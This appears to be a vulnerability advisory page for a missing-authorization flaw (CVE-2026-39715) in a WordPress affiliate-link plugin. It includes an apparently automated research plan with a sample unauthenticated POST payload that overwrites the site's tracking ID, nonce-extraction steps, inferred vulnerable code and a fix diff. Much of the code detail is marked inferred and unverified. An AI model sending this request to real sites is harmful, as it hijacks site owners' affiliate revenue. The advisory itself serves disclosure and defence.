CVE-2026-39715

AnyTrack Affiliate Link Manager <= 1.5.5 - Missing Authorization

mediumMissing Authorization

5.3

CVSS Score

5.3

CVSS Score

medium

Severity

Unpatched

Patched in

N/A

Time to patch

Description

The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

None

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=1.5.5

PublishedMarch 2, 2026

Last updatedApril 15, 2026

Affected pluginanytrack-affiliate-link-manager

Research Plan

Unverified

This research plan outlines the steps to exploit **CVE-2026-39715**, a Missing Authorization vulnerability in the **AnyTrack Affiliate Link Manager** plugin. ### 1. Vulnerability Summary The AnyTrack Affiliate Link Manager plugin (up to version 1.5.5) registers an AJAX handler (or a function on `ad…

Show full research plan

This research plan outlines the steps to exploit CVE-2026-39715, a Missing Authorization vulnerability in the AnyTrack Affiliate Link Manager plugin.

1. Vulnerability Summary

The AnyTrack Affiliate Link Manager plugin (up to version 1.5.5) registers an AJAX handler (or a function on admin_init) intended for saving plugin settings, specifically the AnyTrack Property ID. However, the function fails to implement a capability check (e.g., current_user_can( 'manage_options' )), allowing unauthenticated users to modify plugin settings. This can be used to hijack affiliate tracking by replacing the Property ID with an attacker-controlled one.

2. Attack Vector Analysis

Endpoint: /wp-admin/admin-ajax.php
Action: anytrack_update_property_id (inferred) or anytrack_save_settings (inferred).
HTTP Method: POST
Authentication: None required (unauthenticated).
Preconditions: The plugin must be active.

3. Code Flow

The plugin registers an AJAX action for unauthenticated users:
add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' ); (inferred)
The handler function anytrack_update_property_id_handler is called.
The function retrieves user input from $_POST['property_id'] (inferred).
The function calls update_option( 'anytrack_property_id', $property_id ) (inferred) without verifying if the request comes from an administrator.
Since no current_user_can() check exists, the setting is updated.

4. Nonce Acquisition Strategy

Missing Authorization vulnerabilities often coincide with missing CSRF protection (nonces). If the function does verify a nonce but fails to check capabilities, the nonce must be obtained:

Identify Shortcode: Locate any shortcode used by the plugin (e.g., [anytrack_link] (inferred)).
Create Page:
wp post create --post_type=page --post_status=publish --post_title="AnyTrack Test" --post_content="[anytrack_link]"
Navigate and Extract:
- Navigate to the newly created page.
- Use browser_eval to search for localized script data:
  browser_eval("window.anytrack_admin_params?.nonce") (inferred) or browser_eval("window.anytrack_vars?.save_nonce") (inferred).
Bypass Check: If no nonce check is present in the code, this step is skipped.

5. Exploitation Strategy

The goal is to modify the anytrack_property_id option to an attacker-controlled value (AT-999999).

Request Method: POST
URL: http://localhost:8080/wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded
Parameters:
- action: anytrack_update_property_id (inferred)
- property_id: AT-999999
- _ajax_nonce: [EXTRACTED_NONCE] (if required)

Sample Payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

action=anytrack_update_property_id&property_id=AT-999999

6. Test Data Setup

Install Plugin: Ensure AnyTrack Affiliate Link Manager v1.5.5 is installed and active.
Initial State: Set a legitimate Property ID using WP-CLI:
wp option update anytrack_property_id "AT-123456"
Verify Initial State:
wp option get anytrack_property_id (Should return AT-123456)

7. Expected Results

Response: The server should return a successful AJAX response (e.g., {"success":true} or 1).
Side Effect: The WordPress option anytrack_property_id will be updated in the database.
Impact: All affiliate links tracked by AnyTrack will now use the attacker's Property ID.

8. Verification Steps

After sending the HTTP request, verify the change using WP-CLI:

# Check the value of the property ID option
wp option get anytrack_property_id

Expected Output: AT-999999

9. Alternative Approaches

If the anytrack_update_property_id action is incorrect:

Identify correct action: Search the plugin directory for wp_ajax_ hooks:
grep -rn "wp_ajax_" wp-content/plugins/anytrack-affiliate-link-manager/
Identify admin_init handlers: If no wp_ajax_nopriv hooks exist, check for handlers hooked to admin_init that process POST data:
grep -rn "admin_init" wp-content/plugins/anytrack-affiliate-link-manager/
Check for direct Settings API submission: The vulnerability might allow unauthenticated users to submit to options.php if the plugin registered settings incorrectly. Try submitting a POST request to wp-admin/options.php with the plugin's option group.

Research Findings

Static analysis — not yet PoC-verified

Summary

The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access because it fails to perform capability checks on its settings update functions. This allows unauthenticated attackers to modify plugin configuration, such as the AnyTrack Property ID, effectively hijacking affiliate tracking and revenue.

Vulnerable Code

// anytrack-affiliate-link-manager.php

add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );

function anytrack_update_property_id_handler() {
    if ( isset( $_POST['property_id'] ) ) {
        $property_id = sanitize_text_field( $_POST['property_id'] );
        update_option( 'anytrack_property_id', $property_id );
        wp_send_json_success();
    }
    wp_send_json_error();
}

Security Fix

--- anytrack-affiliate-link-manager.php
+++ anytrack-affiliate-link-manager.php
@@ -1,11 +1,14 @@
-add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
 add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
 
 function anytrack_update_property_id_handler() {
+    check_ajax_referer( 'anytrack_save_settings', 'nonce' );
+
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( 'Unauthorized', 403 );
+    }
+
     if ( isset( $_POST['property_id'] ) ) {
         $property_id = sanitize_text_field( $_POST['property_id'] );
         update_option( 'anytrack_property_id', $property_id );
         wp_send_json_success();
     }

Exploit Outline

The vulnerability is exploited by sending an unauthenticated POST request to the WordPress AJAX endpoint. 1. Target Endpoint: /wp-admin/admin-ajax.php 2. HTTP Method: POST 3. Authentication: None (vulnerable via wp_ajax_nopriv registration) 4. Required Parameters: - action: anytrack_update_property_id - property_id: The attacker's AnyTrack ID (e.g., AT-999999) 5. Methodology: The attacker sends the request without any session cookies or nonces. Because the handler lacks both current_user_can() checks and nonce verification, the update_option call executes, overwriting the site's legitimate tracking ID with the attacker's ID.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/c30df356-6cae-4f8c-a0e6-35c5c66dbe8d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database